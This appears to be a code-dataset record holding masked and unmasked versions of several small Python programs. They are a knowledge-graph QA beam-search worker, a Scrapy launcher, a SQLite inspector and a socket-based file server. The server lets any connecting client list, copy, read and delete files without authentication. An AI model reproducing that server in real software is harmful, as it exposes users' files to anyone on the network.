1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = 
(top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = (r_space, e_space), action_mask\n return action_space\n\n def pad_and_cat(self, a, padding_value, padding_dim=1):\n max_dim_size = max([x.size()[padding_dim] for x in a])\n padded_a = []\n for x in a:\n if x.size()[padding_dim] < max_dim_size:\n res_len = max_dim_size - x.size()[1]\n pad = nn.ConstantPad1d((0, res_len), padding_value)\n padded_a.append(pad(x))\n else:\n padded_a.append(x)\n return torch.cat(padded_a, dim=0).cuda(self.gpu_id)\n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e+31\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i + unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()\n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D\n ) * HUGE_INT\n unique_values_b, unique_idx_b = values_2D.max(dim=1)\n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n\n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = new_r, new_e\n\n def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs\n ):\n for i in range(self.batch_size):\n top_k_edge_labels = []\n for k, log_action_prob in enumerate(l_log_action_probs):\n beam_size = len(log_action_prob)\n for j in range(beam_size):\n ind = i * beam_size + j\n r = self.id2relation[int(l_search_trace[k][0][ind])]\n e = self.id2entity[int(l_search_trace[k][1][ind])]\n if r.endswith('_inverse'):\n edge_label = '<-{}-{} {}'.format(r[:-8], e, float(\n log_action_prob[ind]))\n else:\n edge_label = '-{}->{} {}'.format(r, e, float(\n log_action_prob[ind]))\n if k == 0:\n edge_label = self.id2entity[int(batch_head[i])\n ] + edge_label\n top_k_edge_labels.append(edge_label)\n else:\n top_k_edge_labels[j] += edge_label\n for i, edge_label in enumerate(top_k_edge_labels):\n print(i, edge_label)\n print('*****************************')\n",
"step-5": "import torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nimport torch.multiprocessing as mp\nfrom policy_network import Policy_Network\nfrom util import safe_log\nfrom util import index2word, rearrange_vector_list, get_num_gpus, set_seed\n\nclass TestWorker(mp.Process):\n def __init__(self, args, worker_id, env, d_entity_neighours, d_entity2bucketid, d_action_space_buckets, d_entity2id, d_relation2id, reqa_checkpoint_path, d_results, word_num, entity_num, relation_num, keqa_checkpoint_path, return_trace = False):\n super().__init__(name='test-worker-%02d' % (worker_id))\n self.args = args\n self.seed = args.seed + worker_id\n self.fix_batch_size = args.batch_size\n self.use_keqa_vector = args.use_keqa_vector\n self.max_hop = args.max_hop\n self.beam_size = args.beam_size\n self.return_trace = return_trace\n\n self.d_entity_neighours = d_entity_neighours\n self.d_entity2bucketid = d_entity2bucketid\n self.d_action_space_buckets = d_action_space_buckets\n self.id2entity = index2word(d_entity2id)\n self.id2relation = index2word(d_relation2id)\n self.worker_id = worker_id\n self.gpu_id = self.worker_id % get_num_gpus()\n self.env = env\n self.d_results = d_results\n self.reqa_checkpoint_path = reqa_checkpoint_path\n self.word_num = word_num \n self.entity_num = entity_num\n self.relation_num = relation_num\n self.keqa_checkpoint_path = keqa_checkpoint_path\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.entity_num, self.relation_num, self.keqa_checkpoint_path, self.gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.fix_batch_size), desc=self.name, position=self.worker_id): \n idx = range(example_id, example_id + self.fix_batch_size) \n \n self.env.reset(idx)\n self.batch_size = self.env.batch_size \n \n batch_hits1 = self.rollout() \n hits_1_num += batch_hits1\n\n \n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self): \n batch_question, batch_question_len, batch_head, batch_answers = self.env.return_batch_data()\n\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(batch_head, batch_question, batch_question_len, self.d_entity_neighours)\n \n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1] \n \n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n \n k = int(e_t.size()[0] / self.batch_size) \n\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1) \n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k).view(self.batch_size * k) \n \n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1) \n \n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t, beam_question, beam_question_len, batch_path_hidden, self.d_entity2bucketid, self.d_action_space_buckets, last_r, False, beam_pred_vector) \n db_action_spaces = [action_space for action_space, _ in db_outcomes]\n 
db_action_dist = [action_dist for _, action_dist in db_outcomes]\n \n action_space = self.pad_and_cat_action_space(db_action_spaces, inv_offset) \n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[inv_offset]\n\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(action_dist) \n\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print(\"----\")\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.batch_size * k, -1))\n print(\"------------------------\")\n\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = self.top_k_answer_unique(log_action_dist, action_space)\n else:\n action, log_action_prob, action_offset = self.top_k_action(log_action_dist, action_space)\n \n path_list, (h_t, c_t) = self.model.update_path(action, path_hidden, offset = action_offset) \n self.env.step(action, path_list, (h_t, c_t))\n\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob) \n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n \n batch_pred_e2 = action[1].view(self.batch_size, -1) \n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n \n batch_hits1 = torch.sum(torch.gather(batch_answers, 1, batch_pred_e2_top1).view(-1)).item()\n\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace, l_log_action_probs)\n \n return batch_hits1\n\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n\n log_action_dist = log_action_dist.view(self.batch_size, -1) \n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size) \n\n log_action_prob, action_ind = torch.topk(log_action_dist, k) \n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind).view(-1) \n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind).view(-1) \n log_action_prob = log_action_prob.view(-1) \n action_beam_offset = action_ind // action_space_size \n action_batch_offset = (torch.arange(self.batch_size).cuda(self.gpu_id) * last_k).unsqueeze(1) \n action_offset = (action_batch_offset + action_beam_offset).view(-1) \n\n return (next_r, next_e), log_action_prob, action_offset \n \n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n\n r_space = r_space.view(self.batch_size, -1) \n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n \n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self.gpu_id) \n unique_log_action_dist, unique_idx = self.unique_max(unique_e_space_b, e_space_b, log_action_dist_b) \n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = 
r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0))\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = top_unique_batch_offset + top_unique_beam_offset\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list, padding_value = -float(\"inf\"))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(-1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n \n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[inv_offset]\n action_space = ((r_space, e_space), action_mask)\n return action_space\n \n def pad_and_cat(self, a, padding_value, padding_dim=1):\n max_dim_size = max([x.size()[padding_dim] for x in a])\n padded_a = []\n for x in a:\n if x.size()[padding_dim] < max_dim_size:\n res_len = max_dim_size - x.size()[1]\n pad = nn.ConstantPad1d((0, res_len), padding_value)\n padded_a.append(pad(x))\n else:\n padded_a.append(x)\n return torch.cat(padded_a, dim=0).cuda(self.gpu_id)\n \n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e31\n\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i+unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float() \n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D) * HUGE_INT \n unique_values_b, unique_idx_b = values_2D.max(dim=1) \n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n \n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = (new_r, new_e)\n \n def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs):\n for i in range(self.batch_size):\n top_k_edge_labels = []\n for k, log_action_prob in enumerate(l_log_action_probs):\n beam_size = len(log_action_prob)\n for j in range(beam_size): \n ind = i * beam_size + j\n r = self.id2relation[int(l_search_trace[k][0][ind])]\n e = self.id2entity[int(l_search_trace[k][1][ind])]\n if r.endswith('_inverse'):\n edge_label = '<-{}-{} {}'.format(r[:-8], e, float(log_action_prob[ind]))\n else:\n edge_label = '-{}->{} {}'.format(r, e, float(log_action_prob[ind]))\n \n if k == 0:\n edge_label = self.id2entity[int(batch_head[i])] + edge_label\n top_k_edge_labels.append(edge_label) \n else:\n top_k_edge_labels[j] += edge_label \n \n for i, edge_label in enumerate(top_k_edge_labels):\n print(i, edge_label)\n 
print(\"*****************************\")\n\n\n",
"step-ids": [
6,
9,
10,
12,
14
]
}
|
[
6,
9,
10,
12,
14
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cmdline.execute('scrapy crawl ariz'.split())
<|reserved_special_token_1|>
from scrapy import cmdline
cmdline.execute('scrapy crawl ariz'.split())
<|reserved_special_token_1|>
from scrapy import cmdline
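# programmatic equivalent of running `scrapy crawl ariz` from the shell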
cmdline.execute("scrapy crawl ariz".split())
|
flexible
|
{
"blob_id": "abb2cfd2113e8de6c7bba42c357f0ec140b224a9",
"index": 3311,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncmdline.execute('scrapy crawl ariz'.split())\n",
"step-3": "from scrapy import cmdline\ncmdline.execute('scrapy crawl ariz'.split())\n",
"step-4": "from scrapy import cmdline\ncmdline.execute(\"scrapy crawl ariz\".split())",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cursor.execute(
"select name from sqlite_master where type = 'table' order by name")
print('Tables name:', cursor.fetchall())
cursor.execute('PRAGMA table_info(user)')
print('Table structure:', cursor.fetchall())
cursor.execute('select * from user')
print('Table record:', cursor.fetchall())
cursor.close()
conn.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
conn = sqlite3.connect('app.db')
cursor = conn.cursor()
cursor.execute(
"select name from sqlite_master where type = 'table' order by name")
print('Tables name:', cursor.fetchall())
cursor.execute('PRAGMA table_info(user)')
print('Table structure:', cursor.fetchall())
cursor.execute('select * from user')
print('Table record:', cursor.fetchall())
cursor.close()
conn.close()
<|reserved_special_token_1|>
import sqlite3
conn = sqlite3.connect('app.db')
cursor = conn.cursor()
cursor.execute(
"select name from sqlite_master where type = 'table' order by name")
print('Tables name:', cursor.fetchall())
cursor.execute('PRAGMA table_info(user)')
print('Table structure:', cursor.fetchall())
cursor.execute('select * from user')
print('Table record:', cursor.fetchall())
cursor.close()
conn.close()
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sqlite3
# Connect to the SQLite database file

conn = sqlite3.connect('app.db')
# Create a cursor:
cursor = conn.cursor()
# Query all table names:
cursor.execute("select name from sqlite_master where type = 'table' order by name")
print("Tables name:", cursor.fetchall())
# Query the structure of the user table:
cursor.execute('PRAGMA table_info(user)')
print("Table structure:", cursor.fetchall())
# Query all records in the user table:
cursor.execute('select * from user')
print("Table record:", cursor.fetchall())
cursor.close()
conn.close()
|
flexible
|
{
"blob_id": "dd8f4b08b88d487b68e916e9f92c08c9c0bc39da",
"index": 2681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncursor.execute(\n \"select name from sqlite_master where type = 'table' order by name\")\nprint('Tables name:', cursor.fetchall())\ncursor.execute('PRAGMA table_info(user)')\nprint('Table structure:', cursor.fetchall())\ncursor.execute('select * from user')\nprint('Table record:', cursor.fetchall())\ncursor.close()\nconn.close()\n",
"step-3": "<mask token>\nconn = sqlite3.connect('app.db')\ncursor = conn.cursor()\ncursor.execute(\n \"select name from sqlite_master where type = 'table' order by name\")\nprint('Tables name:', cursor.fetchall())\ncursor.execute('PRAGMA table_info(user)')\nprint('Table structure:', cursor.fetchall())\ncursor.execute('select * from user')\nprint('Table record:', cursor.fetchall())\ncursor.close()\nconn.close()\n",
"step-4": "import sqlite3\nconn = sqlite3.connect('app.db')\ncursor = conn.cursor()\ncursor.execute(\n \"select name from sqlite_master where type = 'table' order by name\")\nprint('Tables name:', cursor.fetchall())\ncursor.execute('PRAGMA table_info(user)')\nprint('Table structure:', cursor.fetchall())\ncursor.execute('select * from user')\nprint('Table record:', cursor.fetchall())\ncursor.close()\nconn.close()\n",
"step-5": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n \r\nimport sqlite3\r\n\r\n# 连接到db文件\r\nconn = sqlite3.connect('app.db')\r\n# 创建一个Cursor:\r\ncursor = conn.cursor()\r\n\r\n# 查询所有表名:\r\ncursor.execute(\"select name from sqlite_master where type = 'table' order by name\")\r\nprint(\"Tables name:\", cursor.fetchall())\r\n\r\n# 查询表user的结构:\r\ncursor.execute('PRAGMA table_info(user)')\r\nprint(\"Table structure:\", cursor.fetchall())\r\n\r\n# 执行查询表user内的所有记录:\r\ncursor.execute('select * from user')\r\nprint(\"Table record:\", cursor.fetchall())\r\n\r\ncursor.close()\r\nconn.close()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pymt_heat import Heatmodel
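# instantiate the heat model component and print its registered name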
heat = Heatmodel()
n = heat.get_component_name()
print(n)
|
normal
|
{
"blob_id": "82801ce564f4f29e084e6f842d7868eb60f582cb",
"index": 6225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(n)\n",
"step-3": "<mask token>\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-4": "from pymt_heat import Heatmodel\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import socket
import threading
import os
import time
import psutil
import shutil
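# Simple remote-administration server: one TCP socket each for commands (8080),
# file transfer (8088), and chat (8085).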
class server:
def __init__(self):
self.commandSock = socket.socket()
self.commandPort = 8080
self.transferSock = socket.socket()
self.transferPort = 8088
self.chatSock=socket.socket()
self.chatPort=8085
self.host = ''
self.bindsocket()
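    # Bind all three listening sockets, accept one client on each channel,
    # then push the available drive letters to the client.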
def bindsocket(self):
self.commandSock.bind((self.host, self.commandPort))
self.transferSock.bind((self.host, self.transferPort))
self.chatSock.bind((self.host,self.chatPort))
self.commandSock.listen(10)
self.transferSock.listen(10)
self.chatSock.listen(10)
self.filename = ""
print ("Waiting for a connection.....")
self.clientTransferSock, self.transferAddr = self.transferSock.accept()
self.clientCommandSock, self.commandAddr = self.commandSock.accept()
self.clientChatSock , self.chatAddr = self.chatSock.accept()
print("Got a transfer connection from %s" % str(self.transferAddr))
print("Got a command connection from %s" % str(self.commandAddr))
print("Got a chat connection from %s" % str(self.chatAddr))
self.sendPartitions()
self.clientCommandSock.send(('Partitions Sent').encode('utf-8'))
print('Partitions Sent!')
def closeServer(self):
self.clientCommandSock.close()
self.clientTransferSock.close()
self.clientChatSock.close()
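    # Main dispatch loop: read a request keyword on the command socket,
    # acknowledge it, and run the matching handler.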
def dicision(self):
while True:
self.message = (self.clientCommandSock.recv(32)).decode('utf-8')
#(self.message)
if self.message == 'Delete Request':
self.clientCommandSock.send('Delete Request Received'.encode('utf-8'))
self.delete()
elif self.message == 'Copy Request':
self.clientCommandSock.send('Copy Request Received'.encode('utf-8'))
self.copy()
elif self.message == 'Send File Request':
self.clientCommandSock.send('Send File Request Received'.encode('utf-8'))
self.sendFile()
elif self.message == 'Listdir Request':
self.clientCommandSock.send('Listdir Request Received'.encode('utf-8'))
self.listdir()
elif self.message == 'Chat Request':
self.clientCommandSock.send('Chat Request Received'.encode('utf-8'))
self.chat()
elif self.message == 'Mkdir Request':
self.clientCommandSock.send('Mkdir Request Received'.encode('utf-8'))
self.mkdir()
def chat(self):
self.chatfile=open('chatfile.txt','w')
self.message = self.clientChatSock.recv(128).decode('utf-8')
self.chatfile.write(self.message+'\n')
self.chatfile.close()
print(self.message)
def mkdir(self):
self.mkdirPath = self.clientCommandSock.recv(128).decode('utf-8')
try:
os.mkdir(self.mkdirPath)
self.clientCommandSock.send('Directory Made'.encode('utf-8'))
print ('Directory Made Successfully!')
except:
self.clientCommandSock.send('Directory Already Exist'.encode('utf-8'))
            print('Directory Already Exists')
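    # Length-prefixed transfer: send the name size, name, and file size,
    # waiting for an acknowledgement after each, then stream the raw bytes.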
def send(self, directory):
print(directory)
self.filename = directory.split('\\')[len(directory.split('\\')) - 1]
self.filename = self.filename.encode('utf-8')
self.nameSize = len(self.filename)
self.nameSize = str(self.nameSize).encode('utf-8')
self.clientTransferSock.send(self.nameSize)
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'Name Size Received':
print('Waiting for Name Size to deliver...')
time.sleep(1)
else:
print('Name Size Delivered!')
self.clientTransferSock.send(self.filename)
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Name Received':
print('Waiting for File Name to deliver...')
time.sleep(1)
else:
print('File Name Delivered!')
self.filename = self.filename.decode('utf-8')
# filename = os.path.join(path,filename)
self.fileSize = os.path.getsize(directory)
self.fileSize = str(self.fileSize).encode('utf-8')
self.clientTransferSock.send(self.fileSize)
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Size Received':
print('Waiting for File Size to deliver...')
time.sleep(1)
else:
print('File Size Delivered!')
file_to_send = open(directory, 'rb')
lines = file_to_send.read()
self.clientTransferSock.sendall(lines)
file_to_send.close()
while (self.clientTransferSock.recv(32)).decode('utf-8') != 'File Received':
print('Waiting for File to deliver...')
time.sleep(1)
else:
print('File Delivered Successfully!')
def delete(self):
self.deleteDirectory = self.clientCommandSock.recv(128).decode('utf-8')
try:
os.remove(self.deleteDirectory)
self.clientCommandSock.send('File Deleted'.encode('utf-8'))
            print('Deleted successfully!')
except:
self.clientCommandSock.send('File Not Found'.encode('utf-8'))
print ('File not found!')
def copy(self):
self.pathes = (self.clientCommandSock.recv(128).decode('utf-8')).split(',')
print(self.pathes)
#shutil.copy2(self.pathes[0], self.pathes[1])
try:
shutil.copy2(self.pathes[0], self.pathes[1])
self.clientCommandSock.send('File Copied'.encode('utf-8'))
print ('Copied successfully!')
except:
self.clientCommandSock.send('File Not Found or Access Denied'.encode('utf-8'))
print ('File Not Found or Access Denied')
def sendFile(self):
self.sendFileDirectory = self.clientCommandSock.recv(128).decode('utf-8')
self.clientCommandSock.send('File Directory Received'.encode('utf-8'))
threading.Thread(target=self.send, args=(self.sendFileDirectory,)).start()
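    # Probe drive letters A: through Y: and send the list of existing ones.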
def sendPartitions(self):
        self.dps_default = psutil.disk_partitions()
fmt_str = "{:<8}"
fmt_str.format("Opts")
self.dps = [chr(x) + ":" for x in range(65, 90) if os.path.exists(chr(x) + ":")]
self.clientCommandSock.send((str(self.dps)).encode('utf-8'))
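    # Send the stringified directory listing, preceded by its length.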
def listdir(self):
self.listdirPath = self.clientCommandSock.recv(128).decode('utf-8')
self.clientCommandSock.send('Listdir Path Received'.encode('utf-8'))
self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath)))).encode('utf-8'))
while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Size Received':
print('Waiting for Listdir Size to deliver...')
time.sleep(1)
else:
print('Listdir Size Delivered!')
self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).encode('utf-8'))
while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Received':
print('Waiting for Listdir to deliver...')
time.sleep(1)
else:
print('Listdir Delivered!')
if __name__ == '__main__':
myServer = server()
    # pass the method itself; calling dicision() here would run its loop in the main thread
    threading.Thread(target=myServer.dicision).start()
|
normal
|
{
"blob_id": "4736f4e06f166b3c3fd8379a2021eb84a34fcbd3",
"index": 6099,
"step-1": "<mask token>\n\n\nclass server:\n\n def __init__(self):\n self.commandSock = socket.socket()\n self.commandPort = 8080\n self.transferSock = socket.socket()\n self.transferPort = 8088\n self.chatSock = socket.socket()\n self.chatPort = 8085\n self.host = ''\n self.bindsocket()\n\n def bindsocket(self):\n self.commandSock.bind((self.host, self.commandPort))\n self.transferSock.bind((self.host, self.transferPort))\n self.chatSock.bind((self.host, self.chatPort))\n self.commandSock.listen(10)\n self.transferSock.listen(10)\n self.chatSock.listen(10)\n self.filename = ''\n print('Waiting for a connection.....')\n self.clientTransferSock, self.transferAddr = self.transferSock.accept()\n self.clientCommandSock, self.commandAddr = self.commandSock.accept()\n self.clientChatSock, self.chatAddr = self.chatSock.accept()\n print('Got a transfer connection from %s' % str(self.transferAddr))\n print('Got a command connection from %s' % str(self.commandAddr))\n print('Got a chat connection from %s' % str(self.chatAddr))\n self.sendPartitions()\n self.clientCommandSock.send('Partitions Sent'.encode('utf-8'))\n print('Partitions Sent!')\n\n def closeServer(self):\n self.clientCommandSock.close()\n self.clientTransferSock.close()\n self.clientChatSock.close()\n <mask token>\n\n def chat(self):\n self.chatfile = open('chatfile.txt', 'w')\n self.message = self.clientChatSock.recv(128).decode('utf-8')\n self.chatfile.write(self.message + '\\n')\n self.chatfile.close()\n print(self.message)\n <mask token>\n\n def send(self, directory):\n print(directory)\n self.filename = directory.split('\\\\')[len(directory.split('\\\\')) - 1]\n self.filename = self.filename.encode('utf-8')\n self.nameSize = len(self.filename)\n self.nameSize = str(self.nameSize).encode('utf-8')\n self.clientTransferSock.send(self.nameSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'Name Size Received':\n print('Waiting for Name Size to deliver...')\n time.sleep(1)\n else:\n print('Name Size Delivered!')\n self.clientTransferSock.send(self.filename)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Name Received':\n print('Waiting for File Name to deliver...')\n time.sleep(1)\n else:\n print('File Name Delivered!')\n self.filename = self.filename.decode('utf-8')\n self.fileSize = os.path.getsize(directory)\n self.fileSize = str(self.fileSize).encode('utf-8')\n self.clientTransferSock.send(self.fileSize)\n while self.clientTransferSock.recv(32).decode('utf-8'\n ) != 'File Size Received':\n print('Waiting for File Size to deliver...')\n time.sleep(1)\n else:\n print('File 